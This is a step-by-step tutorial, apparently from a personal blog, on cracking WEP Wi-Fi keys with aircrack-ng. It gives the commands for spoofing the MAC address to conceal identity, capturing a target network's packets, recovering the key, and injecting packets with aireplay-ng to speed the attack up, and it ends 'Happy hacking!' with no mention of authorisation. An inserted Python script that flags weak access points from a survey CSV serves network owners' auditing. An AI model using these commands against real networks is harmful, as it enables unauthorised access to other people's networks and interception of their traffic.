1.) WEP is a weak encryption system. In this tutorial, we will crack WEP encryption using the aircrack-ng suite (airmon-ng, airodump-ng and aircrack-ng) and obtain the key.
2.) You will need a wireless card, airmon-ng and macchanger. I’m assuming that you already have a wireless card set up properly on a Debian Linux distribution. Otherwise you will need to use ndiswrapper to set it up. See my blog on how to set up a “Wireless Bridge Router with Debian” to do this.
3.) Install aircrack-ng (which provides airmon-ng) and macchanger
apt-get install aircrack-ng
apt-get install macchanger
4.) Run airmon-ng with no arguments to get a list of wireless network interfaces. The screen shot below shows the interface and driver name. I’m using the Trendnet TEW228-PI wireless card; the driver name is rtl8180 and the interface is wlan0.
Results for airmon-ng
5.) Stop airmon-ng, bring down the network interface and change your network card’s MAC address to conceal your identity. Replace (interface) with the interface name found in the screen shot above.
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
My wireless card is configured as wlan0, so the commands in my case are:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
6.) Check which wireless networks are available. If wlan0 is your interface, run:
airodump-ng wlan0
Provides a list of available wireless networks
7.) The screen shot above contains the BSSID (that’s the MAC address of the router), PWR is the signal strength, #Data is the number of data packets read, CH is the channel, MB is the transfer rate, and ENC is the type of encryption. In this exercise, we are only hacking WEP. WPA is a much stronger encryption and requires a different process to hack it. So we want to hack the “home” (ESSID) network. We do so by typing in the following.
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
Fill out the channel and bssid from the airodump-ng (interface) results. Replace (interface) with your interface; (file name) is the prefix of the file to write the captured data packets into. In my case, I ran the following.
airodump-ng -c 6 -w home --bssid 00:12:0E:3C:BC:60 wlan0
Starts capturing data into a file
8.) #Data is the field we are interested in. It tells you how many data packets have been captured and written to the file. You will need at least 15,000 #Data to crack the WEP key. I was able to crack “home” with 25,000 #Data, leaving the computer running for 10 hours. This is the passive method of hacking. If you want to speed things up, you can force packets into the system, but the disadvantage is that it’s not that much faster and it prevents anybody from connecting to the network. See Active Hacking below for more info.
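The fields described in steps 7 and 8 also end up on disk: besides the .cap file, airodump-ng -w (file name) writes a (file name)-01.csv whose first table has one row per access point, with the privacy (ENC) and captured-IV (#Data) columns. The script below is an added example, not part of the original tutorial, showing how a network owner can parse that CSV after surveying their own premises and list every access point still on WEP or open, i.e. the ones that need to move to WPA2/WPA3. The column header matches what airodump-ng writes; the three sample rows are constructed for this example (the “home” BSSID is the one used in this tutorial, the other two are made up).

```python
"""Audit an airodump-ng CSV survey for access points still using WEP or no encryption.

Added example for this tutorial, not the tutorial author's code. airodump-ng -w <prefix>
writes <prefix>-01.csv; its first table (one access point per row) ends at the first
blank line, followed by a second table of client stations that is not needed here.
"""
import csv
import io

# Constructed sample of the access-point table in <prefix>-01.csv. The "home" row uses
# the BSSID from the tutorial; "office" and "guest" are made-up networks for contrast.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:12:0E:3C:BC:60, 2009-03-01 08:00:00, 2009-03-01 18:00:00,  6,  54, WEP , WEP, OPN, -61,  3400, 25000,   0.  0.  0.  0,   4, home, 
00:11:22:AA:BB:01, 2009-03-01 08:00:00, 2009-03-01 18:00:00, 11,  54, WPA2, CCMP, PSK, -70,  1200,     0,   0.  0.  0.  0,   6, office, 
00:11:22:AA:BB:02, 2009-03-01 08:00:00, 2009-03-01 18:00:00,  1,  11, OPN , , , -80,   900,     0,   0.  0.  0.  0,   5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Privacy values that mean the link is readable by anyone who captures it.
WEAK_PRIVACY = {"OPN", "WEP"}


def parse_access_points(text):
    """Return the access-point rows of an airodump-ng CSV as a list of dicts.

    Only the first table (up to the first blank line) is parsed. Fields are
    whitespace-stripped and the numeric columns used for reporting are converted.
    """
    ap_block = text.split("\n\n", 1)[0]
    rows = list(csv.reader(io.StringIO(ap_block)))
    header = [h.strip() for h in rows[0]]
    aps = []
    for row in rows[1:]:
        if len(row) < len(header):
            continue  # skip short or malformed lines
        ap = dict(zip(header, (f.strip() for f in row)))
        ap["channel"] = int(ap["channel"])
        ap["Power"] = int(ap["Power"])
        ap["# IV"] = int(ap["# IV"])  # same count airodump-ng shows live as #Data
        aps.append(ap)
    return aps


def find_weak_networks(aps):
    """Return (essid, bssid, privacy, iv_count) for every open or WEP access point.

    Mixed-mode values such as "WPA2 WPA" are judged by their first token; an empty
    Privacy field is treated as open.
    """
    weak = []
    for ap in aps:
        privacy = ap["Privacy"].split()[0] if ap["Privacy"] else "OPN"
        if privacy in WEAK_PRIVACY:
            weak.append((ap["ESSID"], ap["BSSID"], privacy, ap["# IV"]))
    return weak


if __name__ == "__main__":
    for essid, bssid, privacy, ivs in find_weak_networks(parse_access_points(SAMPLE_CSV)):
        print(f"{essid:<10} {bssid}  {privacy:<4} IVs captured: {ivs}")
```

Run against a real survey by replacing SAMPLE_CSV with the contents of your own (file name)-01.csv. Any row the script prints is an access point whose traffic can be read by a passive listener, which is the condition steps 7 and 8 rely on.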
9.) Finally after obtaining enough #Data, it’s time to get the key. Run this command.
aircrack-ng -b (bssid) (file name-01.cap)
In my case I had to type the following:
aircrack-ng -b 00:12:0E:3C:BC:60 home-03.cap
10.) It should display something like this if the key is found:
KEY FOUND! [ 99:83:4E:00:38 ] (ASCII: ETND9 )
99834E0038 is the WEP key.
That’s it! Happy hacking!
Active Hacking
1.) Continuing from step #8, open a new window and type the following:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
2.) Then run the following:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
3.) Go back to step #9 after getting enough #Data.